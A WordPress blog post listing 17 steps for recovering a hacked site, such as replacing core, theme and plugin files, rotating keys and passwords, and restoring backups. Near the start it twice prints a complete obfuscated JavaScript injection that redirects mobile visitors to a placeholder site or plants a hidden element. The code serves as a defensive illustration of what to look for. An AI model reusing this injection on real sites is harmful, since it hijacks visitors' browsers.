17 Steps to Take if Your WordPress Site Gets Hacked

7
Shares
Share with your friends










Submit

Website hacks are getting more frequent. Hacks can have a multitude of purposes and targets. The goal isn’t always clear. But one thing remains true: it’s a very dark and unpleasant experience. Sometimes your site gets hacked and it gets redirected to some porn site. Sometimes it gets code injected into PHP, or Javascript files. We don’t always know our site has been compromised and sometimes we wait for our visitors to tell us. The message usually has something like “this site may be hacked” or “this site contains malware”

When users visit a site, they will see the Google Red Screen of Death mentioning “this site may be hacked”:

Security Error Website Hack

Then they tell you about it and this is how you find out…

The entire experience is jaded with feelings of devastation and hopelessness. You wonder why you ever decided to have a website in the first place.

Hacks vary in severity. Some of them are malicious and some are just benign, designed to collected data. Whatever the case is, there are certain steps to follow if you think your site got hacked.

They range from malware injections on multiple site files that look like the code below to full scale DDoS attacks.

Here’s an example of a malware injection:

Malware Code Example

/*2ad1c84e2d1ce12e0f0df4a27da38d61*/function YSrOnCNixMIcdVMlajhIMKrzneKKHJF(){var e=”none”;if(“none”!=e){var n=document.getElementById(e);void 0!=typeof n&&null!=n&&(n.outerHTML=””,delete n)}}function CilbNlDaKuEoWmggYrZofsdShwgdPkMSfyWU(){return document.all&&!document.compatMode?!0:document.all&&!window.?!0:document.all&&!document.querySelector?!0:document.all&&!document.addEventListener?!0:document.all&&!window.atob?!0:document.all?!0:”undefined”!=typeof navigator.maxTouchPoints&&!document.all&&RKROQWbhWWUGgzKLxaqzFkDgCUTTzKsFYDIg()?!0:!1}function RKROQWbhWWUGgzKLxaqzFkDgCUTTzKsFYDIg(){var e=window.navigator.userAgent,n=e.indexOf(“MSIE “);if(n>0)return parseInt(e.substring(n+5,e.indexOf(“.”,n)),10);var o=e.indexOf(“Trident/”);if(o>0){var i=e.indexOf(“rv:”);return parseInt(e.substring(i+3,e.indexOf(“.”,i)),10)}var t=e.indexOf(“Edge/”);return t>0?parseInt(e.substring(t+5,e.indexOf(“.”,t)),10):!1}function EjnDzygFuVfOgIDbCfceUmuybGJGKErwxg(){var e=window.navigator.userAgent.toLowerCase();return/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(e)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(e.substr(0,4))?!0:!1}var ywrPsowJfVnLJFhKPFaUPHeduUazYnEuBcrdV=setInterval(function(){if(null!=document.body&&”undefined”!=typeof document.body){if(clearInterval(ywrPsowJfVnLJFhKPFaUPHeduUazYnEuBcrdV),”undefined”==typeof window.v_2ad1c84e2d1ce12e0f0df4a27da38d61){window.v_2ad1c84e2d1ce12e0f0df4a27da38d61=1;var e=RKROQWbhWWUGgzKLxaqzFkDgCUTTzKsFYDIg()&&CilbNlDaKuEoWmggYrZofsdShwgdPkMSfyWU(),n=!e&&!!window.chrome&&”Google Inc.”===window.navigator.vendor,o=-1,i=”http://SOMEWEBSITEGOESHERE”;if(EjnDzygFuVfOgIDbCfceUmuybGJGKErwxg()&&1==o)navigator.userAgent.match(/iPhone/i)||navigator.userAgent.match(/iPod/i)?location.replace(i):(window.location=i,document.location=i);else if(e&&!n&&!EjnDzygFuVfOgIDbCfceUmuybGJGKErwxg()){var t=’<div style=”position:absolute;left:-3532px;”> </div>’,a=document.getElementsByTagName(“div”);if(0==a.length)document.body.innerHTML=document.body.innerHTML+t;else{var r=a.length,d=Math.floor(r/2);a[d].innerHTML=a[d].innerHTML+t}}}YSrOnCNixMIcdVMlajhIMKrzneKKHJF()}},100);/*2ad1c84e2d1ce12e0f0df4a27da38d61*

In either case,  getting hacked is not a fun experience, but keep in mind, this isn’t the end of the world. Nor, is this the end of your website. Everything will be just fine and most, if not all of your site will be completely recovered in the process.

Below I’ll outline some steps you can take to recover from the hack and mitigate the damage.

Common JavaScript Injection Codes

/*2ad1c84e2d1ce12e0f0df4a27da38d61*/function YSrOnCNixMIcdVMlajhIMKrzneKKHJF(){var e=”none”;if(“none”!=e){var n=document.getElementById(e);void 0!=typeof n&&null!=n&&(n.outerHTML=””,delete n)}}function CilbNlDaKuEoWmggYrZofsdShwgdPkMSfyWU(){return document.all&&!document.compatMode?!0:document.all&&!window.?!0:document.all&&!document.querySelector?!0:document.all&&!document.addEventListener?!0:document.all&&!window.atob?!0:document.all?!0:”undefined”!=typeof navigator.maxTouchPoints&&!document.all&&RKROQWbhWWUGgzKLxaqzFkDgCUTTzKsFYDIg()?!0:!1}function RKROQWbhWWUGgzKLxaqzFkDgCUTTzKsFYDIg(){var e=window.navigator.userAgent,n=e.indexOf(“MSIE “);if(n>0)return parseInt(e.substring(n+5,e.indexOf(“.”,n)),10);var o=e.indexOf(“Trident/”);if(o>0){var i=e.indexOf(“rv:”);return parseInt(e.substring(i+3,e.indexOf(“.”,i)),10)}var t=e.indexOf(“Edge/”);return t>0?parseInt(e.substring(t+5,e.indexOf(“.”,t)),10):!1}function EjnDzygFuVfOgIDbCfceUmuybGJGKErwxg(){var e=window.navigator.userAgent.toLowerCase();return/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(e)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(e.substr(0,4))?!0:!1}var ywrPsowJfVnLJFhKPFaUPHeduUazYnEuBcrdV=setInterval(function(){if(null!=document.body&&”undefined”!=typeof document.body){if(clearInterval(ywrPsowJfVnLJFhKPFaUPHeduUazYnEuBcrdV),”undefined”==typeof window.v_2ad1c84e2d1ce12e0f0df4a27da38d61){window.v_2ad1c84e2d1ce12e0f0df4a27da38d61=1;var e=RKROQWbhWWUGgzKLxaqzFkDgCUTTzKsFYDIg()&&CilbNlDaKuEoWmggYrZofsdShwgdPkMSfyWU(),n=!e&&!!window.chrome&&”Google Inc.”===window.navigator.vendor,o=-1,i=”http://SOMEWEBSITEGOESHERE”;if(EjnDzygFuVfOgIDbCfceUmuybGJGKErwxg()&&1==o)navigator.userAgent.match(/iPhone/i)||navigator.userAgent.match(/iPod/i)?location.replace(i):(window.location=i,document.location=i);else if(e&&!n&&!EjnDzygFuVfOgIDbCfceUmuybGJGKErwxg()){var t='<div style=”position:absolute;left:-3532px;”> </div>’,a=document.getElementsByTagName(“div”);if(0==a.length)document.body.innerHTML=document.body.innerHTML+t;else{var r=a.length,d=Math.floor(r/2);a[d].innerHTML=a[d].innerHTML+t}}}YSrOnCNixMIcdVMlajhIMKrzneKKHJF()}},100);/*2ad1c84e2d1ce12e0f0df4a27da38d61*

HELP MY SITE WAS HACKED – “This Site May Be Hacked”

17 Steps to Take if Your WordPress Site is Hacked

 

1. Stay Cool, Calm and Collected

This is not a time to panic. You are probably under a lot of stress and anxiety. The most important thing right now is to stay calm so you can focus on how to handle the situation and mitigate as much of the damage as possible.

Yes, you may lose some traffic, some money and some uptime, but you won’t lose your site. Most likely, you’ll be able to recover from this completely intact.

Take a deep breath and look at this objectively. Remove yourself from the equation so you can focus.

2. Retrace Your Last Steps

What is the most recent change you or somebody who has access to your site has made? Ask around Did you upload a plugin from an unidentified author? Did somebody have a weak password? Do you have a mailing app installed on your site?

Who was the last person who had access to your site? If it was you, try to see what that activity looked like.

3. Browse the Internet for Vulnerabilities

Do any of the themes and plugins you currently have installed on your site have any known vulnerabilities? Check all your dated themes and plugins that need an update to see if there is any vulnerability out there. Google is your friend here.

If all your themes and plugins are up to date, see if there is a known vulnerability with a plugin you have installed. You’ll be surprised to know that there are a lot of plugins and themes that report vulnerabilities. It’s important to identify the problem theme or plugin if there is one. Then we know where to start looking in the FTP client.

4. Delete and Replace All the Core WordPress Files

If your core files are compromised, the best way to mitigate that is to replace all the core files with a fresh WordPress install. Make sure you are not just replacing the core files, but first deleting them and then replacing the install with a fresh install. You can replace all the files without compromising any of your content.

If there is a file that lives in the core directory, but isn’t a core file, and you simply replace all the files, the file will not get overwritten. You will have to find that file and manually delete it. This is why it’s important to first delete the core WordPress install and then replace all your files.

5. Delete and Replace All the Theme Files

You likely downloaded your theme from somewhere or someone. Delete and replace that theme just like you did to the core WordPress files. The same applies to this as to your core WordPress installation.

6. Replace All Your Plugin Files

Got a lot of plugins? Well, this could be the cause of your stress. A plugin vulnerability could be the cause of your hack. In either case, delete all your plugins and replace them with fresh installations. Don’t worry about your configurations, that’s stored in the database. The same applies to this as above.

7. Contact Your Host for a Malware Scan

Contact your host immediately following a hack so they can initiate a malware scan to start determining how much and where the damage is coming form.

Your host is capable of doing a full server scan to see if any extraneous, or non-WordPress files, could be the culprit here. This scan can take some time, but it’s definitely worth doing.

8. Install a Security Plugin and Start a Scan

I recommend using a security plugin called Sucuri. Sucuri scans your whole WordPress file structure to determine if there is any malware detected on any files. If it finds potentially bad files, you may have to replace those files or manually delete the malicious code from the files.

A lot of the time, the malicious code is redundant and can be easily identified, like the example I showed earlier. Sometimes it’s not in the WordPress files at all, but in the Apache files.

9. Check Your .htaccess File for Redirects

Often times, the redirects and minor site modifications occur in the .htaccess file. You can find it by simply opening it up and seeing if there are any redirects happening there. You’ll see the sites that you keep being directed towards in this file, simply delete this bit and you should be back to normal.

10. Check The Google Blacklist

If you’re seeing the Google Red Screen of Death saying

The site ahead contains malware

then most likely, you are already blacklisted. However, that doesn’t mean you can’t be removed from that blacklist. To run a blacklist check I recommend using a tool. This will help identify if your particular site is indeed blacklisted by Google.

11. Change ALL Your Passwords

Yes, that means all. Start off by changing your WordPress passwords and then any other access point you may have in your site. This includes cPanel, WHM, your hosting login, WordPress, etc. Change all your passwords immediately to prevent any additional hackers from entering your site through the easiest methods.

Make sure you use secure password generators to implements this.

12. Kick Everyone Else Out of Your WordPress Site

When someone logs into your site, keys are stored in the browser’s cookies, enabling them to stay logged in, even if the session is expired. This is especially true if the hacker created a new user for themselves as a backdoor.

To do this you need to modify the keys in your wp-config.php file located in your files. You will need a way to access FTP in order to do this. Locate your wp-config.php file and replace your keys with a new set.

13. Delete Any Unauthorized Users

Navigate over to Users and see if you have any weirdos hanging around there. If there is an unfamiliar name in there, delete it immediately. Don’t let users loiter on your site. Get rid of the ones you are unaware of.

14. Log Out of Your Account Everywhere else

Maybe you left yourself logged in somewhere else. Either on a public device, or you lost your phone. Perhaps the hacker is even using your login information. Whatever the case may be, you should make sure that only you are logged into the site with a brand new password.

To do this, navigate to Users–>Your Profile, scroll down to the button that says Log Out Everywhere Else. Click on that and all the other sessions will be terminated.

Profile_WP_Soar_—_WordPress

15. Restore Your Most Recent Backup

Tell me you have a backup. Please tell me you at least backed up your work. Assuming you have a backup of your site, restore the most recent site that you know hasn’t been a problem. The most important piece of the backup here is the files, as they are the ones that contain the malicious code.

You can simply FTP all your files over and keep your existing database after you’ve deleted any unauthorized users and changed all your passwords.

16. Let the Community Know

Send a Twitter blast to your clients. Let the folks who have your email know via an email blast. Post a comment on your Facebook page. Notify your LinkedIn community. This will at least let people know that something is not right and they will perhaps be more forgiving towards your sitiuation. This is especially true if you start sending them thousands of porn emails (true story, ask me in the comments) that were completely unintentional and weren’t your fault.

Once you let people know about your situation, they will likely be more compassionate to your issue. If somebody with experience hears about this, perhaps they can hep you out.

17. None of This Worked…Start Fresh

When all else fails, it may be too late. There is still hope to recover most of your content, but perhaps not much left for your core files. You may have to get a new theme or some new plugins. Maybe it’s time to start from a completely fresh installation of WordPress and hacking up your database to extract all the content manually.

It’s not a pretty process, but it’s doable. Your database stores all of your content, so you can still keep all your content at the very least. You may have to backtrack and re-upload all your images, configure some settings, or just build a brand new look to your web presence.

You may need to download your whole database from PHPMyAdmin (ask your host), and open it in a code editor. Find the posts table and copy the whole darn thing to restore all your content. It will be in HTML format. Trust me, it’s all there. You didn’t lose anything unless your whole database got deleted, in which case your site would be gone too. Well, it could just be back to the default settings and theme with default plugins, but you know what I mean.

Alternatively, you can download just your posts tables, but it may miss some details like comments.

Whatever the case is, this is still not the end of your site. Your wp-content/uploads folder is likely not compromised, and if it is, just download the whole thing and take out all the images. Replicate the file structure and re-upload it. This way your database can still reference the same images and content that you were referencing before.

Effectively, you’re just piecing your site together with the resources that you still have available. This is akin to a manual backup from scratch, if that makes sense.

For the new site make sure you follow the standard WordPress security strategies so that this doesn’t happen again.

What’s your experience with hackers? Have you ever been hacked? How did you solve it? Please comment below.

7
Shares
Share with your friends










Submit
Yury Vilk

About

Yury is a web entrepreneur, owner and founder of WP Soar. His expertise is in WordPress, Internet Marketing, and PPC. He has been working on the web since 2006 helping businesses achieve their online goals.
  • I appreciate Yurk Vilk for your great job done. I would like to add few more points to your post and also list of tips you can find here: http://bit.ly/1WHHImk

    • WP Soar

      Markus,

      Thank you for your comment! I really appreciate it! Great infographic! Please subscribe and get the 27 Golden Laws of On Page SEO. (Look to your right)